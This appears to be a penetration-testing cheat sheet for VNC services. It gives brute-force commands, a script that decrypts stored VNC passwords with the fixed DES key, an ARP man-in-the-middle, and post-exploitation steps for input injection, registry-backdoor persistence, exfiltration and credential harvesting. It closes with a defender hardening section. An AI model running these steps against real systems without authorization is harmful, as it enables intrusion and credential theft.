VNC - Port 5800/5801/5900/5901

Basic info

VNC (Virtual Network Computing) uses the RFB protocol to share desktops remotely. It transmits framebuffer updates and input events. Many implementations (TightVNC, RealVNC, TigerVNC) differ in auth and cipher support; older implementations still rely on an outdated VNC password format (DES/3DES) that can be trivially recovered.

• Default ports: 5900/5901 (RFB/VNC) and 5800/5801 (HTTP gateway to VNC).

• Common issues: default/weak passwords, unauthenticated or misconfigured viewers, legacy 3DES-encrypted .vnc passwords, and open management interfaces.

• Defender quick wins: block VNC ports at the perimeter, force modern authentication (VPN/SSH tunnel + ACLs), rotate creds and disable empty passwords.

Weak or Default Passwords

Test common default VNC passwords for unauthorized access.

# Common VNC passwords
password
12345678
vnc123
admin
administrator

# Try with vncviewer
vncviewer target.com:5900
# Enter password when prompted

Quick Fingerprinting & Discovery

# scan common ports
nmap -sV -Pn -p5900,5901,5800,5801 --script vnc-info,vnc-title,realvnc-auth-bypass <IP>

# web gateway check
curl -I http://<ip>:5800/  # some servers expose a web-based VNC viewer

Shodan search: port:5900 product:VNC or RFB.

Enumeration (manual & automated)

Nmap scripts (vnc-info, vnc-title, realvnc-auth-bypass) reveal server banners, version, supported auth mechanisms and sometimes negotiation failures.

Metasploit auxiliary scanner:

msf> use auxiliary/scanner/vnc/vnc_none_auth
msf> set RHOSTS <target>
msf> run

Python example (basic handshake):

import socket
s = socket.create_connection((host,5900),timeout=5)
print(s.recv(1024))

This shows the RFB protocol version string (e.g., RFB 003.003).

Authentication & Brute Force

• Many boxes still use weak passwords or guest accounts. Test with a targeted credential list rather than noisy wordlists. Tools: hydra, ncrack, vncclient scripts.

• VNC password storage: local VNC server password files (e.g., ~/.vnc/passwd) use an old 8‑byte password format encrypted with a fixed DES key; tools like vncpwd (https://github.com/jeroennijhof/vncpwd) can recover plaintext easily.

Using Hydra

hydra -P /usr/share/wordlists/rockyou.txt vnc://target.com

Using Metasploit

use auxiliary/scanner/vnc/vnc_login
set RHOSTS target.com
set PASS_FILE passwords.txt
run

Using Nmap

nmap -p 5900 --script vnc-brute --script-args passdb=passwords.txt target.com

Using Medusa

medusa -h target.com -u "" -P passwords.txt -M vnc

Password Decryption

Exploit VNC's weak password encryption for credential recovery.

# VNC password locations
~/.vnc/passwd
C:\Users\username\.vnc\passwd
C:\Program Files\RealVNC\vncserver.ini

# Decrypt VNC password
vncpwd /path/to/passwd

# Using Python script
python3 << 'EOF'
from d3des import decrypt
import base64

# Read encrypted password
with open('.vnc/passwd', 'rb') as f:
    encrypted = f.read()

# Decrypt (DES with fixed key)
key = [0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07]
password = decrypt(encrypted, key)
print(password)
EOF

Brute-force:

vncviewer -passwd passwd.txt <IP>::5901
# or use hydra with an amqp/vnc module if available

Extracting VNC password from files (staging/forensics only):

# build vncpwd and run against ~/.vnc/passwd
git clone https://github.com/jeroennijhof/vncpwd.git
cd vncpwd && make
./vncpwd ~/.vnc/passwd

Man-in-the-Middle Attack

Intercept VNC traffic for credential theft and session hijacking.

# Using Ettercap
ettercap -T -M arp:remote /target-ip// /gateway-ip//

# Capture VNC traffic with Wireshark
# Filter: tcp.port == 5900

# Extract VNC password from captured traffic
# Password is DES encrypted with known key

Post‑Exploitation

After successful VNC access you can collect intelligence, maintain access, and move laterally. Only perform these actions in environments you own or have explicit permission to test.

Screen Capture

Capture screenshots of the remote desktop for reconnaissance and data collection.

# Using vncsnapshot
vncsnapshot target.com:5900 screenshot.jpg

# Using vncdo
vncdo -s target.com:5900 capture screenshot.png

# Continuous monitoring (staging/testing only)
while true; do
  vncsnapshot target.com:5900 screen_$(date +%s).jpg
  sleep 60
done

Keylogging and Input Injection

Inject keyboard and mouse inputs to execute commands or access sensitive information. Use vncdo for scripted interactions.

# Send a key sequence or type text
vncdo -s target.com:5900 key cmd
vncdo -s target.com:5900 type "whoami"
vncdo -s target.com:5900 key enter

# Open Run dialog (Windows)
vncdo -s target.com:5900 key win-r
sleep 1
vncdo -s target.com:5900 type "cmd"
vncdo -s target.com:5900 key enter

Notes: avoid long-running keyloggers on production; prefer snapshot-and-review techniques and show captured evidence to stakeholders.

Persistence

Create persistent backdoor access to compromised VNC systems (testing only). On Windows you can create auto-start registry entries or scheduled tasks via the GUI or command shell.

# Example manual GUI flow (Windows):
# 1. Open Run (Win+R)
# 2. Type: regedit
# 3. Navigate to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
# 4. Create new value with path to backdoor executable or script

# Or via command injection through VNC Run -> cmd -> execute commands (be cautious)

Data Exfiltration

Extract sensitive data from compromised VNC sessions.

# Use VNC clipboard (if enabled): copy data in session and paste locally
# Use file sharing: copy files to a shared location accessible to attacker
# Screenshot sensitive data:
vncsnapshot target.com:5900 sensitive_data.jpg

If clipboard and file sharing are disabled, use screenshots and manual copy/paste via the VNC channel.

Lateral Movement

Use credentials or discovery performed in the VNC session to move to other systems.

# From VNC-opened shell (Windows)
ipconfig /all
# or Linux
ifconfig
# scan internal network (use nmap carefully in production)
nmap -sT -p 22,3389,5900 --open 10.0.0.0/24

Use discovered credentials to attempt logins to other VNC servers or services. Abuse saved credentials in browsers or config files when found.

Credential Harvesting

Look for browser password managers, config files, and application logs containing secrets.

# Browser: open browser, navigate to passwords section or export (if available)
# Files: check common app config paths for plaintext credentials
# Keylogging: monitor keyboard input during authentication to capture passwords (use ethically)

Reminder: harvesting credentials must be authorized and documented; never exfiltrate PII unless part of agreed scope.

Hardening & Defender Playbook

Network controls

• Do not expose VNC ports to the internet. Require SSH tunnels or corporate VPN for remote access. Block 5900-5901, 5800-5801 on perimeter firewalls.

Authentication

• Disable empty passwords and legacy auth. Use viewers that support strong authentication (SASL/GSSAPI) or leverage OS-level auth (e.g., Windows RDP instead with NLA). Use per-user credentials and rotate.

Encryption & tunnels

• VNC’s native encryption is weak in many implementations. Require SSH or stunnel to protect RFB traffic, or use VPN. If management UI (5800) is enabled, place it behind auth and TLS.

File hygiene

• Protect ~/.vnc/passwd and do not store clear-text credentials in scripts. Use OS keyrings or secrets managers instead.

Monitoring & Detection

• Alert on inbound connections to VNC ports from unusual IPs. Log new viewer sessions and their durations. Watch for multiple failed auth attempts.

Quick firewall commands:

ufw deny proto tcp from any to any port 5900:5901
ufw deny proto tcp from any to any port 5800:5801
# allow admin subnet only
ufw allow proto tcp from 10.0.0.0/24 to any port 5900:5901

Common Pitfalls & Remediation

• Mistake: Relying on built-in VNC encryption — it may be disabled or weak. Fix: Enforce SSH/VPN tunnels.

• Mistake: Using default or shared passwords for support accounts. Fix: Enforce per-user credentials and periodic rotation.

• Mistake: Leaving web gateway (5800) publicly accessible. Fix: Require web auth, TLS, and restrict by IP.